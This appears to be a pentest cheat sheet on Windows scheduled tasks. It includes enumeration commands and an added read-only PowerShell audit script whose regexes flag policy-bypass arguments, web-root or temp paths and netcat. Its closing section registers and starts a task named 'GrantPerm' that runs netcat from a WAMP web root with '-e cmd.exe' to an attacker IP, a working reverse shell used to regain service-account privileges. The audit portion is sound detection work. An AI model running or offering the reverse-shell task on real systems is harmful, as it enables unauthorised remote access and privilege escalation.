Scheduled Tasks

  • List the tasks the current user can see

schtasks /query /fo LIST /v
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
  • Look for logs or scripts that show the task is actually being run
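When the same enumeration is run from the defender's side, the interesting tasks are the ones whose action matches the pattern used on this page: powershell.exe with an execution-policy bypass, or a binary launched from a web root or temp directory. The following audit script is an added example, not part of the original notes; the regexes and directory list are assumptions and should be extended for your environment.

```powershell
# Added example: read-only audit of non-Microsoft scheduled tasks that flags
# command lines matching the technique described above. Uses only the built-in
# ScheduledTasks module; nothing is registered, started or changed.

# Assumed indicator patterns (constructed for this example; extend as needed)
$SuspiciousArgs = '-Exec(utionPolicy)?\s+Bypass|-EncodedCommand|\s-e(nc)?\s|-nop\b|-w(indowStyle)?\s+hidden'
$SuspiciousPath = '\\(wamp|xampp)\\www\\|\\inetpub\\|\\Users\\Public\\|\\Windows\\Temp\\|\\AppData\\Local\\Temp\\|\bnc(64)?\.exe\b|\bnetcat\b'

function Get-SuspiciousScheduledTask {
    Get-ScheduledTask | Where-Object { $_.TaskPath -notlike '\Microsoft*' } | ForEach-Object {
        $task = $_
        # LastRunTime tells you whether the task has actually fired yet
        $info = Get-ScheduledTaskInfo -TaskName $task.TaskName -TaskPath $task.TaskPath -ErrorAction SilentlyContinue
        foreach ($action in $task.Actions) {
            # Only Exec actions carry a command line; COM-handler actions are skipped
            if (-not $action.Execute) { continue }
            $cmdline = "$($action.Execute) $($action.Arguments)"
            $reasons = @()
            if ($cmdline -match $SuspiciousArgs) { $reasons += 'policy-bypass / hidden / encoded PowerShell arguments' }
            if ($cmdline -match $SuspiciousPath) { $reasons += 'binary or script in web root, temp directory, or netcat' }
            if ($reasons.Count -eq 0) { continue }
            [PSCustomObject]@{
                Task        = $task.TaskPath + $task.TaskName
                RunAs       = $task.Principal.UserId      # e.g. NETWORK SERVICE / LOCAL SERVICE / SYSTEM
                RunLevel    = $task.Principal.RunLevel
                Author      = $task.Author
                State       = $task.State
                LastRunTime = $info.LastRunTime
                CommandLine = $cmdline
                Reason      = ($reasons -join '; ')
            }
        }
    }
}

Get-SuspiciousScheduledTask | Format-List
```

Pair the output with Security log event 4698 (task created) and the Microsoft-Windows-TaskScheduler/Operational log to see who registered a flagged task and when it last launched.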

Restoring Privs for NETWORK SERVICE or LOCAL SERVICE

  • Create a scheduled task that spawns a reverse shell with the account's privileges restored

$TaskAction = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-Exec Bypass -Command `"C:\wamp\www\nc.exe $KALI_IP $PORT -e cmd.exe`""
Register-ScheduledTask -Action $TaskAction -TaskName "GrantPerm"
  • Start the nc listener, then start the task

Start-ScheduledTask -TaskName "GrantPerm"